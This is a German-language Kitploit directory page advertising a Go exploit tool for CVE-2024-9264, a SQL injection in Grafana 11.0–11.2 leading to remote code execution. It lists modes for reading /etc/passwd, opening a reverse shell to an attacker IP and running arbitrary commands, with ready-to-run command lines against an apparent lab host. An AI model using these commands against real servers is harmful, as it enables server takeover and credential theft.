Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-9264 — Eine Go-Implementierung für CVE-2024-9264, die Grafana-Versionen 11.0.x, 11.1.x und 11.2.x betrifft. | Kitploit
Tools/GitHubGitHub/cythonic1/cve-2024-9264
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubcythonic1/cve-2024-9264

CVE-2024-9264

Eine Go-Implementierung für CVE-2024-9264, die Grafana-Versionen 11.0.x, 11.1.x und 11.2.x betrifft.

Repository anzeigen
31vor 1 JahrNoch nicht geprüft
Webseite

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 CVE-2024-9264 - Grafana SQL-Injection, die zu Remote Code Execution (RCE) und Datei-Lesen führt

Exploit-Tool für CVE-2024-9264, eine kritische Schwachstelle in Grafana, die es authentifizierten Angreifern ermöglicht, SQL-Abfragen auszuführen, was zu RCE führt

🛡️ Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Penetrationstests bestimmt.
Unautorisierte Nutzung ist illegal und unethisch.


🧠 Überblick über die Schwachstelle

🕳️ Was ist CVE-2024-9264?

CVE-2024-9264 ist ein kritischer Fehler in Grafana, der es authentifizierten Angreifern ermöglicht, SQL-Befehle auszuführen, was zu RCE und Datei-Lesen führt.

🧬 Grundursache

  • Unzureichende Bereinigung (Sanitization).

💥 Auswirkungen

  • RCE: Beliebige Befehle ausführen, Reverse Shells erhalten oder sensible Dateien lesen.
  • Hoher Schweregrad: Vollständige Serverübernahme möglich, wenn erfolgreich.

  • ⚒️ Funktionen

    • Unterstützt mehrere Angriffsmodi:
      • file – Beliebige Dateien lesen (z. B. /etc/passwd)
      • shell – Reverse Shell zum Angreifer-Rechner
      • command – Beliebige Shell-Befehle ausführen (z. B. whoami)
    • Anpassbare Angreifer-IP, Port und Anmeldedaten

    🚀 Verwendung

    Hilfemenü

    Nicht alle Argumente sind erforderlich.

    Beispiele

    Shell erhalten

    go run main.go -ip 10.10.16.91 -port 8080 -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type shell

    Dateien lesen

    go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type file -filename /etc/passwd

    Einzelnen Befehl ausführen

    go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type command -cmd 'ls -al'

    🔧 Befehlszeilen-Flags

    go run main.go [flags]

    Tool herunterladen